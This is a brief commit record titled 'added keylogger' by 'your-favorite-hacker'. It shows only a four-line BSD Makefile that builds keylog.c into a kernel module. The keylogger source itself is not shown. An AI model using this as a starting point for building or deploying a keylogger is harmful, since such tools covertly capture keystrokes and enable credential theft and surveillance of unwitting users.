added keylogger

This commit is contained in:
your-favorite-hacker
2015-06-03 15:01:26 +02:00
parent 094b73988e
commit 8568c3f484
4 changed files with 204 additions and 0 deletions

4
keylog/Makefile Normal file
View File

@@ -0,0 +1,4 @@
SRCS=vnode_if.h keylog.c
KMOD=keylog
.include <bsd.kmod.mk>